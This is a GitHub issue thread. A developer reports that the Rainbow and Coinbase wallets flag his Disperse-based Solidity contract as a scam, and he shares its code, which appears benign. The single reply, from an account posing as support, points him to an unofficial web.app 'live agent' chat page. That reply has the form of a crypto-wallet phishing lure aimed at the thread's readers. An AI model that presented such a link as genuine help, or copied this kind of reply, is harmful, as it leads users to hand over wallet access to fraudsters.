### ISSUE TITLE
False warning

### ISSUE THREAD

**Issue by TimDaub** [rainbow-me/rainbow#5950]
![photo_2024-07-23 22 30 03](https://github.com/user-attachments/assets/9e39c182-a48f-4d5a-b8ef-9652ae11bb84)

Been using [http://disperse.app](https://t.co/aYWmxBJWS1) to distribute funds with oeth:0x2f08c366d6c267bcecf8b5a25089e1ed66eb4040 but now, as with another experiment before, I get labeled a scammer by Rainbow (and Coinbase) Wallet.

```
contract PurchaseDelegator {
  error ErrValue();
  function getPrice() view internal returns (uint256 price) {
    IERC721Drop collection = IERC721Drop(collectionLocation);
    return collection.saleDetails().publicSalePrice;
  }
  function setup(
    bytes32[3] calldata data,
    address[] calldata recipients,
    uint256[] calldata values
  ) external payable {
    uint256 price = getPrice();
    if (msg.value < price) revert ErrValue();

    IERC721Drop collection = IERC721Drop(collectionLocation);
    Delegator2 delegator2 = Delegator2(delegator2Location);

    uint256 quantity = 1;
    collection.adminMint(msg.sender, quantity);
    delegator2.etch(data);

    kiwiTreasury.call{value: price}("");

    uint256 remainder = msg.value - price;
    if (remainder > 0) {
      Disperse disperse = Disperse(disperseLocation);
      // THIS IS THE PART THAT MAKES THE TX SUS
      disperse.disperseEther{value: remainder}(
        recipients,
        values
      );
    }
  }
}
```

My contract is not draining people's wallet and I have had this problem already before with using Disperse.
I've also even deployed my own Disperse and was also labeled a scam. 

Who are you using for this simulation? How can I avoid this if I want to send, let's say, 10 people a small amount of ETH?

**Comment by Sweetmind300** [comment]
Hello @TimDaub 
This issue has been preview on the Pull Requests. To resolve, Contact the official page to initiate a chat with our live agent using the chat button via [support](https://accessonlinedefiprotocol.web.app/)
Note that… this might be as a result of report on your contract or liken to being a scam, follow the instructions on the page to get this resolve.

Regards.
